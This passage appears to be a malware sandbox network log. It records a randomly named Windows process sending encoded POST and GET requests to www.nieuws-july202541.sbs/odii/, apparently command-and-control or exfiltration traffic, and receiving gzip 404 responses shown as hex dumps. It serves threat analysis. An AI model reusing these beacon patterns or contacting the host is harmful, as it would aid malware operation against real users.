                                                                                                                              Data Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 1351ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                                                              Oct 7, 2024 12:34:28.111044884 CEST1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                                                              Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                                                              Oct 7, 2024 12:34:28.111056089 CEST1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                                                              Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                                                              Oct 7, 2024 12:34:28.111212015 CEST1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                                                              Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                                                              Oct 7, 2024 12:34:28.111222029 CEST293INData Raw: 04 af 63 9e 5d ee ed c2 f9 6e 00 ff 84 fc 95 50 d7 57 cc 9f c8 72 cd fe a7 c0 fd 0c 54 7f 7a 41 d5 9f 3f d5 c6 45 e0 f7 b6 bc de f1 79 f8 8f 34 06 d4 f9 4e 09 cf aa ba fb f6 08 7f b6 ea 11 fe c8 3c 37 80 fa 80 af ab 08 f1 ca e2 e3 73 65 ef bd c2
                                                                                                                              Data Ascii: c]nPWrTzA?Ey4N<7se]?z{ZWeV}N@gHP;$7AJNYW`w$wH|*_bj`2ZweCfovM3pKuJAhpM=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.650006162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:30.051422119 CEST811OUTPOST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 51 58 70 48 38 4c 6c 73 75 51 34 71 5a 68 33 43 51 35 75 58 37 79 6c 37 6e 4f 42 77 48 70 39 4f 56 72 69 77 67 30 34 42 39 6c 47 30 4f 4a 57 42 52 70 4e 4a 32 4d 6d 58 34 56 49 73 39 41 64 6b 42 6f 4a 53 47 44 33 35 48 49 78 43 45 59 43 4f 4c 31 59 44 47 78 39 35 6b 70 62 59 31 58 6c 49 4a 30 6a 66 34 69 66 75 2b 44 42 66 51 62 47 6e 64 39 54 42 66 73 50 4d 58 63 35 72 67 67 62 39 49 47 51 39 5a 4a 77 45 74 37 73 76 4b 68 73 77 30 2b 44 67 4f 4e 54 52 30 65 45 51 67 57 54 73 51 6d 69 6b 4f 53 63 57 38 59 35 53 44 63 67 47 6f 34 66 4a 30 41 62 41 4b 73 41 70 43 67 50 49 75 6d 62 4c 51 6e 41 54 6a 77 66 44 4c 6b 32 33 70 4f 48 31 74 4e 66 78 47 79 61 64 49 54 79 70 54 77 3d 3d
                                                                                                                              Data Ascii: ej6Le=QXpH8LlsuQ4qZh3CQ5uX7yl7nOBwHp9OVriwg04B9lG0OJWBRpNJ2MmX4VIs9AdkBoJSGD35HIxCEYCOL1YDGx95kpbY1XlIJ0jf4ifu+DBfQbGnd9TBfsPMXc5rggb9IGQ9ZJwEt7svKhsw0+DgONTR0eEQgWTsQmikOScW8Y5SDcgGo4fJ0AbAKsApCgPIumbLQnATjwfDLk23pOH1tNfxGyadITypTw==
                                                                                                                              Oct 7, 2024 12:34:30.677895069 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:30 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 135BZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                                                              Oct 7, 2024 12:34:30.677911997 CEST1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                                                              Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                                                              Oct 7, 2024 12:34:30.677922010 CEST1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                                                              Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                                                              Oct 7, 2024 12:34:30.678037882 CEST1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                                                              Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                                                              Oct 7, 2024 12:34:30.678049088 CEST288INData Raw: 04 af 63 9e 5d ee ed c2 f9 6e 00 ff 84 fc 95 50 d7 57 cc 9f c8 72 cd fe a7 c0 fd 0c 54 7f 7a 41 d5 9f 3f d5 c6 45 e0 f7 b6 bc de f1 79 f8 8f 34 06 d4 f9 4e 09 cf aa ba fb f6 08 7f b6 ea 11 fe c8 3c 37 80 fa 80 af ab 08 f1 ca e2 e3 73 65 ef bd c2
                                                                                                                              Data Ascii: c]nPWrTzA?Ey4N<7se]?z{ZWeV}N@gHP;$7AJNYW`w$wH|*_bj`2ZweCfovM3pKuJAhpM=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.650008162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:32.589368105 CEST1824OUTPOST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 51 58 70 48 38 4c 6c 73 75 51 34 71 5a 68 33 43 51 35 75 58 37 79 6c 37 6e 4f 42 77 48 70 39 4f 56 72 69 77 67 30 34 42 39 6c 4f 30 4f 2f 43 42 51 4f 5a 4a 33 4d 6d 58 78 31 49 76 39 41 63 68 42 6f 42 57 47 44 72 70 48 4b 35 43 46 2b 4f 4f 50 30 59 44 4d 78 39 35 73 4a 62 46 32 6e 6c 6e 4a 30 7a 62 34 69 50 75 2b 44 42 66 51 5a 4f 6e 61 73 54 42 5a 73 50 4c 51 63 35 2f 7a 77 62 46 49 47 5a 41 5a 4a 45 2b 74 4e 63 76 4b 42 38 77 79 49 66 67 47 4e 54 54 7a 65 45 49 67 57 66 7a 51 67 47 53 4f 53 6f 76 38 66 78 53 41 5a 42 6b 34 34 6a 74 71 52 33 46 53 62 42 43 63 6d 54 36 69 51 4f 33 52 6b 6b 30 6f 7a 66 4b 49 44 4f 78 72 74 57 34 6f 50 54 74 49 79 33 2f 4f 53 76 41 4c 35 4d 7a 66 51 4f 53 59 48 75 4d 77 50 73 59 58 2f 74 75 66 67 37 7a 34 52 45 41 2b 54 59 73 5a 52 54 78 43 42 36 43 58 43 30 45 4b 4f 4f 77 56 51 70 4b 37 62 78 42 43 65 36 32 46 32 78 5a 2b 64 53 5a 31 6f 31 41 53 67 70 62 54 69 79 59 49 54 49 54 32 37 64 59 67 75 62 70 48 39 52 38 47 31 54 4e 53 2b 73 38 73 4d 4d 7a [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=QXpH8LlsuQ4qZh3CQ5uX7yl7nOBwHp9OVriwg04B9lO0O/CBQOZJ3MmXx1Iv9AchBoBWGDrpHK5CF+OOP0YDMx95sJbF2nlnJ0zb4iPu+DBfQZOnasTBZsPLQc5/zwbFIGZAZJE+tNcvKB8wyIfgGNTTzeEIgWfzQgGSOSov8fxSAZBk44jtqR3FSbBCcmT6iQO3Rkk0ozfKIDOxrtW4oPTtIy3/OSvAL5MzfQOSYHuMwPsYX/tufg7z4REA+TYsZRTxCB6CXC0EKOOwVQpK7bxBCe62F2xZ+dSZ1o1ASgpbTiyYITIT27dYgubpH9R8G1TNS+s8sMMzc/W7R6LHmvoAUlKV53gF/0annNIMjTxb2riPMqX2LFViDatedzzm6qRLw0JSW30SLAinylAEUqx8oSFN75CtXYuQTgw/RGFf6QBGJAGT6gmgLpAbM67X06LZgH/T+hUE3iaLDtWpunlxcrsbabgVwWoO+dmjsVGyEbYxI6nxj28J+GhpnfXSZhaB5JveeHYtVxTIeXxMHcQQEPJVYSuq6Pe3x1C/oJ+YIsRoKGogog0+E6UEKyY0jm4GzBMc2SKAO0cS1I9lTlpO7+jMTiwZln1gajDRBHi3JIr+3vrLmnTvi2ONqhVbvk8q6I4n/JWjmMjnWJjZuoPhgsUCyrPiVJD0mCzES7faVPgacGD+NQ5OPgdjHtqaAqbTm0G2w2KqpUpVmtDZJoVE7Fp51kBSvuwaOcjTscNs+bHtC3qxTMEPwhpUJWTfdH4OFZMfaDJDyd8OopcoFb4Da/PDhaA1sWZBn/hGVpqE/2k5uBKMl75/P1HgIltAdbkGFHxA+fUJluD7rXZlKqDf/EFpjizijD0L81vyKd5MCMqBx+0Huxd/hQiU/UYM0iJM6hXaFutz45eo2MC3ICQdIBA0rF0/TBYi7M2Yi+hhQVCkF0CjrNH3aEYFjPxRFtv4c7M6Gi9Kcl1kDAOdqGNhllWOz0cFW6YW3Z1ZqJuBcE [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:33.201721907 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:33 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                                                              Data Ascii: 135BZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                                                              Oct 7, 2024 12:34:33.201790094 CEST1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                                                              Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                                                              Oct 7, 2024 12:34:33.201807022 CEST1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                                                              Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                                                              Oct 7, 2024 12:34:33.201822996 CEST1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                                                              Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                                                              Oct 7, 2024 12:34:33.201843023 CEST288INData Raw: 04 af 63 9e 5d ee ed c2 f9 6e 00 ff 84 fc 95 50 d7 57 cc 9f c8 72 cd fe a7 c0 fd 0c 54 7f 7a 41 d5 9f 3f d5 c6 45 e0 f7 b6 bc de f1 79 f8 8f 34 06 d4 f9 4e 09 cf aa ba fb f6 08 7f b6 ea 11 fe c8 3c 37 80 fa 80 af ab 08 f1 ca e2 e3 73 65 ef bd c2
                                                                                                                              Data Ascii: c]nPWrTzA?Ey4N<7se]?z{ZWeV}N@gHP;$7AJNYW`w$wH|*_bj`2ZweCfovM3pKuJAhpM=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.650009162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:35.156199932 CEST513OUTGET /odii/?ej6Le=dVBn/8h3nxQ+NW3HHa2Dil9IxOpuSbZnLfq0vBwwz2PjK6Osa+4r5Mmz4BUq4xUHF4JCazXFRId1LoC3dnRZfR9dh4rO42NOGnzVyjLt/mUqEpvHWr7qJMesP485wi7mHEQ5T/k=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:34:35.712127924 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              date: Mon, 07 Oct 2024 10:34:35 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
                                                                                                                              Data Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                                              Data Ascii: 278D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:35.712145090 CEST1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                                                              Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                                                              Oct 7, 2024 12:34:35.712153912 CEST448INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                                                              Oct 7, 2024 12:34:35.712271929 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20
                                                                                                                              Data Ascii: border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relative; overf
                                                                                                                              Oct 7, 2024 12:34:35.712282896 CEST1236INData Raw: 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 39 32 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 61
                                                                                                                              Data Ascii: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD/////////////////////
